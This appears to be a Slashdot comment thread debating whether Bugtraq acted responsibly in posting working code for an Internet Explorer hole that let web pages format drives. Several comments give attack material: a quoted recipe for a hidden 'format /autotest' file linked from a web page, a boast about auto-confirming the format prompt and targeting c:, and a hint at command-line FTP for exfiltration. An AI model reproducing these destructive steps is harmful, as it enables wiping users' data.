We made a web site that showed how to clean an infected system and had downloadable infected files for virus researchers. At the request of some of the researchers, we took off the files and gave an email address for researcher requests instead.
Surprisingly, we got emails from script kiddies (some posing as researchers, some not) trying to get copies of the virus.
But, by the end of that week, there were separate executables from a few companies implementing our cleaning methods, and the next round of signatures could detect it.
I think it would have been a better idea for these guys to just post the solutions and keep the exploit code itself as secret as possible. MS will prettymuch HAVE to deal with this one. It's the kind of exploit you hear about in hoax emails, but I don't think it's going to make their lives much easier knowing that this exploit is so widely available, not to mention the people who get hit by it.
vk.
vk.
Not the whole full-disclosure discussion again. The topic has been discussed to death on pretty much every security-related mailing list, newsgroup, whatever for the past years.
And frankly, if you surf with IE, which has known security holes that have been unpatched for well over a year, you simply deserve whatever you get.
Assorted stuff I do sometimes: Lemuria.org
1 - User opens malicious site with malicious java applet ... ...
.. there is no format C:
2 - Malicious applet sends user subliminal messages "Fooormmmat yourrr harddd driveee"
3 - User starts feeling uncontrolable urges
4 - User formats drive
This does not work on linux
I fuse with Mercer every single day...
You can get a patch here.
No, actually, the *responsibility* lies with ...
Is Ford then responsible for the ensuing carnage when some tool realises he can drive on the other side of the road? no..
what more can i say, whoever posted this bug/working code should be shot
Under Mac OSX 10.1, Internet Explorer 5.1.2 runs as root or as some kind of su and has access to the entire system and basically doesn't care if you have directories ath you would rather protect. Mozilla respects FS protections. Under MacOSX the Java JDK documentation is hidden away in the the Frameworks/Java... directories where a non admin user has no access. To browse these I usually make a link in my browser to the index.html file and carry on from there. I discovered that IE lets you in everywhere it can go while Moz doesn't.
Differing perspectives on security, I suppose.
Pritty much ALL the articles in BugTraq help script kiddys.
Right, because script kiddies don't hang out on IRC and get this stuff before Bugtraq. Also, the sky is not blue and there is no porn on the internet.
The most sensible thing I've ever read about this kind of question is crptogram article last year by Bruce Schneier.
Prime numbers are exactly what Alan Greenspan says they are -S. Minsky
Just because you can find the code "everywhere else on the web" does not mean you should share the code yourself. I find something like this akin to leaving porn magazines in your yard because the neighborhood kids will find them in the trash bin (or surfing the net - sic) anyway.
It's like "I know how to hang a person - here, let me give you a demonstration." Does sharing the code that can cause the problem allow you to protect yourself against it? Probably not; unless you are out there building tools to protect us - that's right US, including the very experience tech people here - against such attacks.
I don't like the idea of non-disclosure. I want to know if there is a potential that something bad could happen to me or my clients; and that I should start working on or be on the lookout for preventative measures. That's why we have vulnerability lists. In that same hand I believe that Too Much Information is not polite - to the users and the vendor. Here's how you make the gun; oh and here are some bullets. It is almost criminal in its intent - considering the mindset of many today it *is* criminal in its intent - regardless of target.
I think with the interesting people, their lives can't possibly be wrapped up into a nice little package.
It seems to me that there are a lot of people that, if their harddrive reformats, they will drop their machine in the trash and go and buy a new one. This would mean that MS will be selling more of their OS. Yes, this is a paranoid thought, and I am sure that our friends in Redmond wouldn't do this.
.
If script kiddies want to put a virus on a machine, then if they reformat that machine, they don't get to do this. As a matter of fact, it really ought to give them no satisfaction at all as the machine will be down and out and gone.
More dangerous would be if this was used as a way to attack our systems by our enemies.
In any case, we can keep hashing over this all day. Two weeks for such a serious bug doesn't seem that long to me. .
In germany Heise.de even published an exploit:
C't Browsercheck
You can test your IE and report the results to your boss.
See also:
Sandblad at Securityfocus
The exploit doesn't scare me as much as it adds more fuel to the SuperVirus theory I've been worried about for awile.
I believe that it's only a matter of time before someone creates a "SuperVirus", A Virus with all previously successful exploits, and unleases it on the world.
With the recent outbreaks of klez, code red, nimda, kak, sircam, and other viruses that do minor damage and proliferate fast through multiple exploits its only a matter of time until a script kiddie gets it into his head to combine them all and make a virus that infects everything, spreads though multiple existing holes, and does a massive amount of damage via either DDOS, Format after a set time, or Both.
In Soviet Russia, Trojan exploits YOU!
you need to get a sense of humor.. stat!
People who use IE obviously *like* living dangerously. If they didn't, they wouldn't be using IE, would they?
Oh, wait, you think that they don't *know*? Pshaw! They're like the people who choose to drive SUVs like a sports-car -- they may _say_ that they don't know, but either they do, and are lying, or they don't, and are stupid. Either way, the responsibility likes with the user.
There are enough people out there pointing out that IE and Outlook are broke and dangerous that there's no reasonable way anyone can think they they aren't. Except if they put their fingers in their ears and go "LalalalalaIamnotlisteninglalalalala" whenever the subject comes up.
The IE users who get hit by this exploit should suck it up and take responsibility for their risky actions. And have a good backup system in place, of course.
Would the publication of this sploit violate the law in any way? Look at it this way: If you can use the sploit to format a hard drive, you can use it to D/L possibly copyrighted material off the victim computer, right? And as we all know, the RIAA and MPAA have it in big for technologies that can violate copyright. Wasn't that the whole premise of the DeCSS per^H^Hrosecution?
This is not my sandwich.
thst's a big hole, i wonder if bill gates will hae to patch that one up personally
I just tried out what the supposed exploit is suppose to do, and though it did bring up a chm file, it did not execute the rest of the script. Instead, IE choked, and crashed and everything was fine. No files were written to my hard disk, and Mine Sweeper did not start up. According to the original post on securityfocus, it looks like it applies to a bug that went unfixed for IE6. I am trying my testing on my system which is a W2k SP2 with IE5.5 SP2. Perhaps this really only does apply to IE6? Maybe it was a bug that originated in a previous version, went through CM and somehow, someone forgot to make the appropriate code changes for the IE6 release?
It seems like every couple weeks there is an article on /. to the effect of "BIG HOLE IN IE/XP/[MS APP HERE] DISCOVERED. THE END IS NEAR! REPENT, MS USERS" etc etc...ZZZZZZZzzzzzzzzZZZZZZZ -_-
There are only so many times you can read a headline like that before the "cry wolf" factor starts to kick in. All these "bugtraq" alerts are academic...theoretical...What I want to see is a headline that reads Merrill Lynch crippled by XP flaw. Plans to sue MS for millions $$$ damages or somesuch. Or at least a story of an actual user whose life was ruined by an actual MS security hole. Something tangible...Now THAT would be interesting!
As a side note, you could try usinginstead. It will have the same effect. In this case, not formatting your hard drive.
What new ground is broken here?
None.
The simple fact remains that Micro$oft produces products that are riddled with the most egregious of security lapses, and that Micro$oft has an unrivaled history of dragging it's feet/passing the buck, even when billg is hit over the head repeatedly with the fact that his minions have unleashed yet another f*ckup on the unsuspecting public.
So, it's possible to contrive html that, when viewed on a remote web site, reformats the local hard drive of the box IE is running on?
Are you kidding me?
billg and every single idiot who was anywhere close to being involved with this f*ckup should be sued for every last penny they have.
As for full disclosure, let 'er rip.
It's the only way Micro$oft will ever be held in the least bit accountable for their crap.
t_t_b
I'm on PJ's "enemies" list! Are you?
I copied the code, saved it as a.html, put it up on a webserver and opened it with IE 6. All that happened was the help file started.
I remember a similar vulnerability from a couple months ago (it too was based on the windows help file), and I patched against that, so maybe that patch stopped this one? I don't normally use IE, but maybe I flipped something to turn off some of the scripting.
Anybody else not have a problem?
As it happens, a bug of this type has been around for a long time, affecting non-SP1 installations of WinXP (such as my own). However, The Screen Savers described the bug and how to fix it on national television. No harm done.
On the other hand, some people are saying here that the bug has only been known for about 12 days. I think that this is simply not true. Because all the news agencies are walking on eggshells not to give ANY USEFUL INFORMATION WHATSOEVER, I can't be sure whether this is the same exploit or not. If it is, then it has, in fact, been known about both inside and outside Microsoft since JULY. The Screen Savers talked about it on September 10. If it is the same exploit, then 12 days is naievely underestimating how long the exploit has been around.
don't get mad at the bring of bad news, get mad at the idiots who left this bug in their shitty software.
Ok, so Microsoft illegally uses their market power to drive competition out of the marketplace.
Anti-microsoft zealots post the code to take advantage of an IE security hole, allowing malicious coders to erase Microsoft from the marketplace.
Do both suck for the end user? Yes. But they're also both Microsoft's fault.
Let's face it, this is a case where it is 100% ok to blame Microsoft for having a crappy product. If Ford screwed up and made a car that anyone could unlock and start by doing something special to it, allowing the car to be easily stolen by anyone, you wouldn't blame the guy who posted how to do it on the Internet, you'd blame the Ford engineers who screwed up the design in the first place and the people who let that mistake out of the factory.
Microsoft screwed up, Microsoft customers get screwed over, Microsoft's fault.
paintball
If you were confronted by someone who had just lost a bunch of important data because of this exploit, do you really think they'd be impressed if you said "But I was trying to make a very important point to Microsoft!".
Instead of that, you should say "By not fixing the bug, Microsoft was trying to make a very important point to you!"
Then they will at least be angry at the right entity.
I tested the code on my Win2000 IE 6.0 machine, and it popped up a javascript window, a Windows help menu, and a command prompt (which appeared minimized), all farely quickly. However.. the command prompt was waiting for me to push "y" to the "do you really want to format?" y/n prompt.. I don't believe there's a /Y switch either.. at least, not a documented one, so perhaps it can't format your drive after all?
"Truth is not decided by majority vote" consensus gentium -- Norman Geisler
A large problem is that web applications tend to require javascripting in order to function. Sure, I have a bit of javascripting in mine, but this sort of exploit is the reason why I make sure the app degrades gracefully. You really, really need to check and validate passed vars and such on the server side anyway. So - first make it work without javascripting, and then enhance it using javascripting.
Life for security conscious admins would be much easier if we all abided by this principle.
Stop the brainwash
Since when have Mozilla and pals been perfect?
All these people ranting about "It's your own fault - using sofware you know is defective..." - I'm sorry, but I don't know of any software that I know to have no defects.
At least IE gets regular fixes through auto-update. Mozilla et al don't tend to do that and also don't tend to *work* as well as IE for most browsing needs. It it's a choice between two bits of software, neither of which I know to be secure, I might as well choose the one which does most other things better.
This is just a copy of Andreas Sandblads advisory, with a new command.
http://wwx.dino-soft.org/auto.html
note: prefix altered in "wwx". Needs to be reversed into "www" to make the URL work -
The above url when viewed WILL FORMAT THE A:\ drive when viewed on a fully updated and patched windows system. If you go there make sure there is nothing in the A:\ that formating will harm; because this has been tested
and works on Windows 2000 WinXP/home/corp/pro Win98/SE.
This is a harmless POC to give you experts here a heads up; because Microsoft HAS been informed of the hole; but they seem to be sitting on there hands maybe much like the recent XP hole that they knew about before XP even shipped; but chose to wait until SP1 to correct.
This is VERY DANGEROUS, and this little harmless POC could quite easy be made to be quite nasty; but when the author of the original hole who's hole I have sort of legoised and made to work a very little bit differently Microsoft had this to say to the original author:
"Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".
It seems that what's really irresponsible is not what Bugtraq did, but running IE to begin with. It's history of security flaws and exploits along with Microsoft's foot-dragging responses make it utterly irresponsible to run such software.
That said, no one is immune from security exploits. The argument for posting it to Bugtraq seems mainly to be that this motivates the vendor to move quickly now that their customers know about the exploit and now that nefarious types have easier access to it. (Don't fool yourself into thinking the most malicious types didn't usually already acquire it by other means.)
But if what we really want to do is motivate vendors to patch things quickly, it should be the first rule of Bugtraq that no exploit is posted until the vendor is informed. Most linux security exploits are resolved within about 48 hours, while it is true that Microsoft often takes weeks or months. Given our competing interests in both informing the vendor privately and getting information to the public, we should balance these in a reasonable way. One such solution might be that Bugtraq adopt a rule that after a vendor is informed, they have 48-72 hours after which time it will be posted.
For both the responsible vendors and the free software community this approach would balance our interests in minimizing exploits while a solution is actively pursued while also acknowledging the benefits of full public disclosure.
In the case of smaller vendors than MS who might not have the resources for such a quick bug-fix, an appeal process could be instituted wherein the vendor may contact Bugtraq during the initial grace period and request an extension. Guidelines based on the resources of the vendor and the seriousness of the bug could be used to determine whether another 48-72 hours should be granted.
BWCarver
Like Digital Freedoms? Then donate to EFF before they're gone.
Does this mean I should get Mozilla?
And there is no hard and fast answer to this question. In this case however, we see a serious vulnerability. At the very least, Microsoft should have been allowed a couple working days to verify the problem, post an acknowledgement, and at least a temporary work-around --even if that work-around cripples their product in some way.
After a couple weeks with a bug this severe, they really ought to have posted a patch of some sort. The fear that the "script kiddies might take this snippet of code and run with it" is almost irrelevant. It's the professional spies and organized crime groups we ought to be scared of.
This script was inevitable. Why blame the messenger?
Nearly fifty percent of all graduates come from the bottom half of the class!
if the bug is disclosed in any manner, with or without malicious or non-malicious exploit code, _YOU_ as the public have benefitted.. there is no room for morality in full disclosure
Ever seen a consumer complaints program where they expose and sort out people's problems. This is identical, what is the big deal. Wasn't there a bug that allowed you to use on of M$'s scripting pages (on HDD) to delete files? It's great that somebody tries to make M$ make more hardened software.
puts ("Python r0cks\n");
Just Say No To IE(R). You cannot get much more simple, than that. And don't even think about going on about "I can't view my favorite web sites then..." etc, publicly accessible sites that write for one specific platform and/or browser should be boycotted. No hits, no ad dollars, no ad dollars, no business, no business, no platform/browser discrimination. Let YOUR non-IE web browser speak for you.
And I'm still waiting for some guy(or gal) to come out of the blue with a killer virus and wipe the internet clean....
Candy-Coated Knowledge
Of coarse they are "investigating the issue", I am sure they are "investigating the issue", I am sure that they are "investigating" every "issue" that has ever been submitted... When someone asks about that issue.
Even if they are actually investigating it, are they really WORKING on it (read large team of experienced programmers familiar with the code), or are they just working on it (a single pimple faced intern coming up with ideas that his manager shoots down without consideration)?
It has been shown that massive attention is the only way to get action from the Redmond Giant, so... the messenger should not be shot.
"I'll have a Guinness, no wait, make that a Coors Light" -Grad student I work with, who shall remain anonymous...
Remeber, it's the script kiddies that format your hard drive, not the malicious code!
Now if only someone could break into update.microsoft.com and put the exploit there...
(The windos update program uses IE. Good design decision to use your most insecure piece of code for security updates, isn't it?)
Assorted stuff I do sometimes: Lemuria.org
If you read Sandblad's actual BugTraq posting you will see that he had notified Microsoft more than a month before posting the details of the exploit. Quoting:
Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".
How much time does a company have to actually fix a problem this serious? When somebody takes the trouble to notify a company about a defect, they've already demonstrated helpfulness and responsibility. It would make sense for the company to take that helpful, responsible person into the loop, and at least update them periodically about what is being done about the problem. That would give a helpful person like Sandblad a basis for continuing to wait. In this case Microsoft gave no indication that they were doing anything about the problem or intended to do anything about it. Continuing to sit on the information certainly wouldn't give them any further incentive. Sandblad reported this problem, got a thanks-but-no-thanks, then after a month of no news went over their heads to the public. I would say he handled it very responsibly.
Comment removed based on user account deletion
or cylinders.
I don't see why symmantec is getting the bum rap.. MSOS & Middleware is full of holes and it's about time Joe Public realized it. Even if that realization comes with the deletion of all of his precious Pron!
My machine is up to date with patches. It also runs a real-time antivirus scanner at all times. To break the windows-iexplorer-outlook trio, I use mozilla and mozilla mail. The whole thing is behind a debian woody NAT machine which has no incoming ports open, and the smb shares that the NAT offers is periodically scanned for viruses by a linux port of an antivirus program. The windows 98 machine runs its own firewall program (tinyfirewall), not to close ports, but to prevent rogue programs from phoning home.
Under such a situation, I expect a reasonable level of security. Nothing more, nothing less. I'm still going to set up an email-virus scanner (for my own knowledge), and I know that there are ways around my security (most of them require ignorance on my part though), but I feel safe.
<humor> Now, if someone were to say that there weren't any holes in IE, that would be controversial. this is just "business as usual - where have your files gone today?". </humor>
It's just unfortunate that this is the sad reality.
Why exactly, does the world feel entitled to control the results of research it did not pay for, and had nothing to do with? To wit, why would I, as a security researcher (see my web page for some examples) give away for free the results of my research to Microsoft, Sun, IBM, or any other company, when doing that research cost me significant time and money? The era of software vendors getting research for free is over. Now, they get it when everyone else gets it - whenever I have the spare time and energy to explain it in small words, or whenever they pay me money to do so, whichever comes first. I think you'll see more and more small consulting companies and independant researchers moving towards this policy. We don't need the "fame" from having a one line attribution in a vendor's advisory, and we have more lucrative things to do than explain every little aspect of our research to an ungrateful and frankly hostile vendor's "security response" staff.
That's excellent! Bravo! A very concise and appealing way of describing the problem, and MS's way of dealing with it.
Under the rug there's a trapdoor leading to the apartment below me.
Give up, it's hopeless. Believe me, I tried. Even if you board up all the doors, someone'll still find a way to sneak in through the kitchen window you left ajar and clean out all the treasures in you trophy case. You just can't win.
Where does the hypocrisy end, Taco?
Because IE sucks.
I guess we can add this to the 100+ features why mozilla is better then IE :-)
< blunk blunk! >
I'm assuming that you have no issue with Bugtraq's posting of the initial advisory from Andreas Sandblad on the 6th. Now, the code that was posted on the 14th (over a week later) that is causing all this ruckus was cut-and-pasted from a discussion going on on ZDNet forums. In other words, those that would do harm already had the code.
I'll grant you that posting it to Bugtraq probably doesn't add all that much information for the "good guys" (except that the javascript in the "format a:" version is simpler to read), but it has the added benefit of getting someone like Wired to make a big stink out of the whole affair. The publicity is important as a way of getting the bug fixed. Security bugs are viewed by Microsoft (and anyone in the consumer software industry) as PR problems - posting this to Bugtraq doesn't make the bug any worse for users of Microsoft's systems (since the kiddies already have it), but does make it much worse for Microsoft. It's much harder to spin away a bug when live, functioning exploit code is staring you in the face.
Comment removed based on user account deletion
I can't hear no heads grinding away with your spelled-it-all-out line.
Not even when writingdo I hear any heads grinding.
I do, however, smile at your obvious frustration. Relax a bit, this is not worth getting that all worked up over.
Not to troll, but perhaps slashdotters should be extra careful of the links they click (for those on IE) in the near future.
Goatse is disturbing and easily detected, but I'd imagine that this script could be setup almost anywhere, making it easy to slip in a slashdot comment.
And yes, I'm sure there are probably enough trolls on here that somebody would try it if they knew how.
right here
getSexySig();
1. When correcting spelling/grammatical/usage errors, you should quote the words/phrases in question, as follows: "BugTraq," not "bugtrack..."
2. "Quibbling," not "squibbling" (as another reader has pointed out).
3. "BugTraq is a mailing list dedicated to full disclosure." No; BugTraq is a mailing list dedicated to tracking bugs. One of its principles is full disclosure.
4. "...it becomes up to the person who..." - very poor grammar. Better: "...it's the responsibility of the person who..." or "...it falls to the person who..."
5. "...be responsible for it's content." "Its," not "it's." ("It's" is the contraction of "it is.")
6. "...notification before releases..." Singular or plural? The terms should agree. Use either "...notifications before releases..." or (better, since this usage means a general principle) "...notification before release..."
I'm not even out of your first paragraph yet; there are at least as many more errors as I've already listed. My point is this: if you're going to be pedantic, at least be correct.
Sorry to be heavy-handed; for what it's worth, i agree with your point.
I actually posted a similar question to "Ask Slashdot" about a year ago. It didn't get accepted, but basically it said the following:
[snip] This brings up the question of whether or not the benefits of disclosing the information out weigh the problems. While attackers can exploit the holes, it pushes companies to release a patch as soon as possible. Personally I'm all for disclosing the full information. But that got me thinking about another example of security disclosure. After September 11 it was impossible to escape "news reports" speculating on the next terrorist attack and their next weapon. They mentioned that small pox would be a good weapon and went on to detail why. They said we have no cure and we're not prepared for it and basically said that if they used that against us we'd be powerless to stop it. I also saw reports on the least secure airports and how people sneak weapons through security and so on. I was angry when I saw this information being broadcast for anyone, including terrorists, to see. They could easily use this information to plan another attack. The reporters were doing the terrorist's research for them. In theory, these are the same debates. Should vulnerable information be disclosed in order to better prepare for or fix the security hole? I'd be curious what other people think. Can you support full disclosure of security holes in software, but not support full disclosure of certain national security threats without being a hypocrite?
K-meleon & Phoenix are still faster than Opera7, and free & libre.
Looks like automated formats via "mined" web pages in Explorer have been around for a while now. This Bugtraq link is from back in 1999:
/ 20 02-09-30/2002-10-06/0
/autotest" at the MS-DOS C:\ prompt.
.pif file ("Format.pif") with the Command Line set to:
/autotest"
.bat file ("Format.bat") with a single command:
/autotest"
.pif or .bat file to the targetted web
http://online.securityfocus.com/archive/1/28213
Bits of note include:
"The key is the Format command's "/autotest" flag, which I believe was
put into place early on in MS-DOS's history to assist in batch
processing, and was probably dropped from the documentation some time
back (it's not in my DOS 5.0 manual as far as I can tell -- although
that's not too far in the past). It can be tested for by entering:
"Format a:
The automated format via web page can be accomplished as follows (with
the example shown demonstrating how to create a link on a web page which
will automatically format Drive A):
1) Either:
Create a
"C:\WINDOWS\COMMAND\FORMAT.COM a:
And Working Line set to:
"C:\WINDOWS\COMMAND"
Or:
Create a
"format a:
(Should the user wish to format another disk, the a: may be
replaced with c:, d:, e:, etc.)
2) Link to the file on a web page as follows:
Click Me
Or:
Click Me
According to the method chosen for implementation in step 1. These
links may be placed beneath graphics or text, as would be found on a
regular web page.
3) Upload the html document and
server directory and wait for an unwary user to click the link and
'Open'.
Spooky, eh?
These steps don't create a Trojan Horse so much as an out-right "Cyber Mine" which will be activated on a user's machine the instant they click the link and accept the file into their system. As the download of the 1k file is almost instantaneous, damage will be made to the user's data in a matter of seconds. "
What would really worry me is if someone cracked into a high traffic sight and added this code. The havoc it would cause would be interesting. ie. slashdot or cnn.com tainted with such code.
Does anyone remember the time when Yahoo finally found that someone had edited the text on their frontpage. White on white text that could be highlighted. I don't know the details, but I knew about it long before yahoo discovered this.
It *can* happen, but now companies are definately more security cautious.
Fortunately, I use mozilla, I made the full time switch and lived with the minor bugs the day Gator mysteriously installed itself on my system while browsing with ie. (there was a previous story on the incident with that exploit).
"You should always go to other people's funerals; otherwise, they won't come to yours." -- Yogi Berra
An example can be seen in the game everquest. There was an exploit that allowed characters to crash portions of the world with almost no effort. It was left in for months because it was mainly contained on one server. It had been /bugged and reported to the maintainers of the game multiple times w/o response.
Finally, a player from the server became fed up and posted exactly how to exploit it on multiple message boards where it would be widely seen. Within days it was being used on ALL servers with regularity. It was patched in the next patch less than a week later.
Companies deal with jobs related to their importance which is not only the serverity but the population effected, (if anyone has watched fightclub when he's speaking about his job you get the idea). By spreading the knowledge the importance is increased. And the bugtraq is the best place to spread it as it will get out to as many people responsible for security as possible.
I do security
And to be honest, I'd be much more scared about something likethan I would about having my hard disk formatted.
(Didja know there's a one-step command-line FTP in Windows? Very useful for this kind of activity.)
Download and install Mozilla.
Yes, Mozilla has had its share of security flaws, but they generally get fixed faster, too.
You can format your hard drive and if you want to be a SysAdmin ( for the heck of it) you can also format others harddrive
Yea..Mozilla beat that !!!!
If you've ever read FlatLand, you'll know that it's possible to get into a completely locked and secure room.
Big Deal! Anyone who browses the web as root in Windows XP knows enough not to go to malicious web sites. Not to mention they probably use mozilla anyways :)
So I figured that I could avoid this by just deleting the key in my registry for IE help so that the OCX would never load and the exploit wouldn't work. I did that and it solved the problem! But wait... Windows is now trying to "help" me by putting that registry key back the way it was! Thank you so much Windows for saving me from myself and reopening the door to my harddrive. What would I do without you?
After reading the proof-of-concept script at http://online.securityfocus.com/archive/1/298748, I now know at least to avoid blind links.
Also, I've come up with this possible solution:
In IE, bring the potentially malicious page to the front, then press Ctrl-O to get the Open prompt. Enter this:
javascript:void(location.replace=null)
then click OK. Now anytime that a javascript on that page tries to do a location.replace command will now instead issue a null command (no command at all). (Assuming the script hasn't already been activated, under an onLoad event or something)
This works with annoying exit pop-up ads too:
javascript:void(window.onunload=null);
You can do this with all sorts of javascript commands that get abused. Find some offensive pages, look at their source, and disable the commands you see used often. (onunload is probably the worst and most often used).
Major inspiration from this cnet builder page.
$8.95/mo web hosting
security hole in IE that allows malicious web pages to reformat a hard drive
Surely there's a typo here. If I discover that the computer I'm working on has Windows installed, you're saying that all I need to do to reformat the hard drive is click on one of these web sites?
MS's software is bloated and security-hole-ridden - we all know that. I've seen a couple posts about people 'losing important data' .. how about don't use IE? Seems simple enough. Between Mozilla, Opera, & Nutscrape there are plenty of functional alternatives.
When channel x news sneeks a weapon through airport security and alerts the airport. Then a month later does the same thing, should they alert the public to make them aware of the danger?
If you are right, this changes the extire scope of this article. If MS said uhuh, then let them have it.
Why, o why must the sky fall when I've learned to fly?
This way the vendor knows the clock is ticking, and ance you've published the puzzle and the encrypted exploit no ammount of legal manuvering can put the cat back in the bag, so to speak. Basically, it allows you to put pressure on the vendor while still being responsible and giving the vendor a month (for instance) head start. You can put decent bounds on how long it will take the fastest consumer machines to solve the puzzle. There's currently a puzzle running that's supposed to get completed shortly before the MIT Laboratory for Computer Science's 70th b-day, for instance.
Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
Great. You've now thrown up a speedbump.
[h4x0r] dude! u see that sploit on bugtraq?
[z3r0c001] yea but its broken
[h4x0r] i no but i talked 2 m4sterbl4ster, he is l33t and fixed it
[h4x0r] u want a copy
[z3r0c001] yea!!!!
Not all punks are scriptkiddies.
Secondly, much of an issue is a something only the vendor can do. And the vendors have historically shown that they will not address security issues unless sufficiently motivated. Vendors are businesses. And customer demand is the motivation vendors best understand.
Unfortunately, customer demand is only created by sufficiently demonstrating a problem. Its one thing to claim something exists. Its entirely different to DEMONSTRATE that it exists. The dirty little non-secret is that such demonstrations ultimately involve considerable pain to the very people who would be saved.
And that is where the main message is being lost. Yes, the public is realizing that there is some serious security problems out there. But instead of demanding better products, they blame the messanger. Instead of asking "why is my email client so insecure", the question asked is "why do people write viruses?"
The emporer has no clothes. And instead of dealing with the issue at hand, we have "experts" demanding that those who are posting notices about this situation to the public stop. As if the situation would improve if everyone just ignored it. Perhapse less people would see the naked emporer if they stopped looking. It would make the tailor's union happy. And it would probably please those who publish and sell expensive books on the subject. But it does nothing for the public, nor ultimately the emporer him/itself.
I think the word "kiddie" in "script kiddie" belies some of the risks.
I'm betting that most of your "script kiddies" are 30-something, college-educated folks, who have not insignificant amounts of IT experience. Sure there are 13 year olds out there too, but "script kiddie" imparts a certain bias that may bring with it complacency.
they are just beta testing thier new DRM!
If you don't prove it, they will deny it. The ability to erase everything is the threat that all root exploits pose. It's about time the popular press understood the implications. God knows, M$ spends enough money denying the ability and on Astro turfing where people who suggest such things belong to the tin foil hat camp.
I hope this blows all the way up to and beyond CNN. I'm tired of people looking at me like I'm crosseyed when I tell them that IE is full of holes that alow others to look at your files and erase them. M$ can'nt buy the entire mass media forever.
Friends don't help friends install M$ junk.
umm... I think the cracker community has thier own system of karma, in the form of reputations. The guy who fixes the exploits for the kiddies gets massive ammounts of karma. There are plenty of smart people willing to fix the exploits for the kiddes, if nothing else, it raises the "noise floor" for hunting down the skilled crackers. Posting broken exploits isn't security though obscurity, it's security though denial.
Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
The Wired talks more about bugtrack's handling of the whole thing, and how it essentially posted working code for the exploit. Was it irresponsible or not?
What's irresponsible is living in a fantasy world and thinking that Bugtraq are the only ones capable of exploiting a bug like that. Just because you don't talk about it and shh shh it doesn't make the bug disappear and unexploitable. Shit man just like any exploit someone is gonna write code to exploit it if it's in their interest or for fun or just because they are pure evil. With something like this; shit as soon as the exploit was posted I'm sure there were people writing code to exploit the shit.
Even if that were true, it would not have worked. How long does it take someone to fix the trivial error and post it back? Months? I think not.
I'd be willing to bet 95% of the break-ins on the internet are plain old script kiddies.
Here you are right, and M$ plays right into it. The whole closed software world encourages people to not understand what's going on inside their computer, and makes it impossible to secure even if you do have the skills and time. Worse, with M$'s planned obsolecense practices we all know that the average M$ box is built and rebuilt all the time from ancient "unpatched" CDs. Just ask this obviously self moderated loudmouth for example. So there you have it, a world full of broken and unfixable machines all serving a single company's bottom line at the expense of their owners and the rest of the world.
Friends don't help friends install M$ junk.
"And, yes, it would be different if this were Linux, or BSD, or even MacOS. All those operating systems come with companies or communities who take security seriously, and they respect their users enough to not foist insecure features on them."
Really?
Show me the security bulletin on Redhat's website for the issues found in KDE last August.
The sad fact is the Linux support community is even worse than Microsoft. They don't even acknowledge problems even after they've been patched by the development team. Maybe it's just a lack of communication mechanisms, but whatever it is it is bizarre.
Honestly, never was so much fuss made about a pointless feature that should be just be disabled and forgetten about.
Jon.
Then again, do you really think script kiddies really care what you and I think? No software is perfect and will contain bugs. This is why there's QA and interative development. The real solution here isn't to place blame which American culture loves. The real solution is to make sure software is design and built to a high standard. Everything after the fact is simply rationalizations and poor attempts to deflect responsibility.
A whole new mechansim to remove yourself from spam!
Note also that it's been 6 weeks since he contacted Microsoft and basically got a one-fingered salute. This is similar enough to other problems with IE in the past that it's not too far fetched to assume the black hats already know aboout it. Microsoft needed the only kind of wake up call they respond to -- a public relations stink.
Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
Exactly what constitutes a security hole?
The current issue, to me, appears to not be so much a bug as it is leaving the back door unlocked. The article describes how the user can disable scripting, etc. Once you do that, it's no longer a problem. Once you lock the back door, the bad guys can't get in.
Security ultimately lies in the hands of the end user, whose responsibility it is to to know what each of the options are and what the impacts are of them. If checking a box makes your system more secure, then that's the user's responsibility, not the vendor's. The vendor has a responsibility to inform the user of the impact of various security settings, and to define a set of default settings that result in a secure system. If there is a vulnerability that can't be resolved by a checkbox, then it becomes the vendor's responsibility to issue a bug fix.
As a layman, I don't see it as anything that Microsoft can resolve, except a "patch" that changes the security settings. If it is indeed a flaw, then it should be exploitable with the appropriate security settings enabled. (I don't have a deep understanding of scripting in IE, so perhaps there is a flaw that I'm not seeing.)
I see a responsibility of users to inform other users of security lapses and inform them of an appropriate course of action. That is what the article mentioned in the parent post does. There is also a responsibilty to not disparage the software vendor unless it is a legitimate bug, that bug results (or could result) in a compromised system, AND the vendor refuses to acknowledge it or issue a patch for it in a timely manner. It is irresponsible to provide the public with details or code describing specifically how to exploit the flaw.
Give me my freedom, and I'll take care of my own security, thank you.
faggotfuck.com? Does not exist. You fail it. P.S. Happy Troll Tuesday.
Step 1:- Troll Step 2:- Step 3:- Profit!
So it formats your drive when you use IE.
Isn't that good? stop whinning about it.
that when I read this I was in my C++ class and I actually was laughing out loud for about 5 minutes. I stated that "Microsoft sure does suck." Not that I hate all microsoft stuff (XP = god-like). But, in this instance they sure do suck. Then I just thought about how lucky I am that Mozilla exists.
SIGFAULT
I just modified the script and was able to format a floppy disk on a co-workers machine. I was able to pipe the \n character into it to get it to start automatically. It is very simple to replace a: with c:. Good luck to all you windows users, you're going to need it now.
My point is, the cracker community doesn't need bugtraq to even find these exploits. If you follow my reasoning (that possibly 95% of hacks are script kiddies who just run pre-compiled apps), by not providing these working exploits on a popular security site you could decrease attacks dramatically.
Think gun safey. I'm not saying you can't have a gun. I'm not saying you can't use a gun. I'm saying I'm not going to give you a gun that's loaded, with the safety off.
"I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatently stolen sig)
I'm working to see just what it will take to make this script install linux
Actually, I meant IE for Mac, not for Windows (Note that I said IE Mac is better than IE Windows). Remember that in choosing a browser, I mainly care about features that I actually use.
